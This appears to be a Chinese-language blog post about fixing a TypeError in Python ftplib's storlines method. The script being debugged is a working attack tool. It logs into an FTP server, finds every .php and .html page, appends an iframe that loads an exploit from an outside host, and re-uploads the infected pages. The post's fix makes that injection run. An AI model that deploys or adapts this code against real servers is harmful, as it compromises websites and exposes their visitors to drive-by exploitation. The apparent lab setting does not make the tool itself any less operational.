Python内置模块FTPLIb的 STORLINES方法运行出错解决过程

FTPLIb STORLINES方法出错解决过程

错误现象

import ftplib
import optparse
import sys

class FTPWebpageDetect:
    def __init__(self) -> None:
        self.target = self.get_params()[0]
        self.port = self.get_params()[1]
        self.username = self.get_params()[2]
        self.password = self.get_params()[3]
        self.session = self.ftplogin()
        self.dir_list = []
   
   
    def get_params(self):
        parser = optparse.OptionParser('Usage: ./%s -H host -p port -u username -P password' % sys.argv[0])
        parser.add_option('-H', '--host', dest='host', type='string', help='Specify target server')
        parser.add_option('-p', '--port', dest='port', type='int', help='Specify port')
        parser.add_option('-u', '--username', dest='username', type='string', help='Specify username')
        parser.add_option('-P', '--password', dest='password', type='string', help='Specify password')
        options, args = parser.parse_args()
        if options.port is None:
            options.port = 21
        if options.host is None or options.username is None or options.password is None:
            print(parser.usage)
            sys.exit()
      
        return options.host, options.port, options.username, options.password
    
    def ftplogin(self):
        try:
            ftp = ftplib.FTP()
            ftp.connect(host=self.target, port=self.port)
            ftp.login(user=self.username, passwd=self.password)
            print("[+] Successfully logged in")   
            return ftp      
          
        except:
            print("[-] Failed to log in")
            sys.exit()
    
    def manipulate_page(self, page, payload):
        f =  open(page+'.tmp', 'a+')
        self.session.retrlines('RETR '+page,f.write)
        print("Downloaded page:\n")
        f.write(payload)
        f.close()
        self.session.storlines('STOR '+ page, open(page+'.tmp'))
        print("Inserted code into the page")
    
    def run(self):
        payload = '<iframe src="http://192.168.176.128:8080/exploit"></iframe>'
        try:
            dir_li = self.session.nlst()
            if len(dir_li) > 0:
                for each in dir_li:
                    each = each.lower()
                    if '.php' in each or '.html' in each:
                        self.dir_list.append(each)
        except Exception as e:
            print("Something is wrong: %s" % e)
            sys.exit()
        
        if len(self.dir_list) > 0:
            print("[+] The following web page are found on the server:\n")
            for each in self.dir_list:
                print(each)
                self.manipulate_page(each,payload)
                

if __name__ == '__main__':
    ftp = FTPWebpageDetect()
    ftp.run()

运行代码后出现一下错误

Traceback (most recent call last):
  File "/root/Desktop/Hack_Project/new/ftp_webpage_detect.py", line 73, in <module>
    ftp.run()
  File "/root/Desktop/Hack_Project/new/ftp_webpage_detect.py", line 68, in run
    self.manipulate_page(each,payload)
  File "/root/Desktop/Hack_Project/new/ftp_webpage_detect.py", line 48, in manipulate_page
    self.session.storlines('STOR '+ page, open(page+'.tmp'))
  File "/usr/lib/python3.9/ftplib.py", line 532, in storlines
    if buf[-1] in B_CRLF: buf = buf[:-1]
TypeError: a bytes-like object is required, not 'str'

解决方法

根据提示TpeError: a bytes-like object is required,出错的方法是storelines，查看该方法的说明:

“”ethod) storlines: (cmd: str, fp: SupportsReadline[bytes], callback: ((bytes) -> Any) | None = ...) -> str
Store a file in line mode. A new port is created for you.

Args:
cmd: A STOR command.
fp: A file-like object with a readline() method.
callback: An optional single parameter callable that is called on
each line after it is sent. [default: None]

Returns:
The response code.”“”

这里说，首先storlines方法的第二个参数，并不是传入字节或者字符串，尝试用open(page+'.tmp').read()依然出错

这里需要传入的是文件指针fp，但是需要以'rb'方式打开

只要加上'rb'，即可得到正确结果。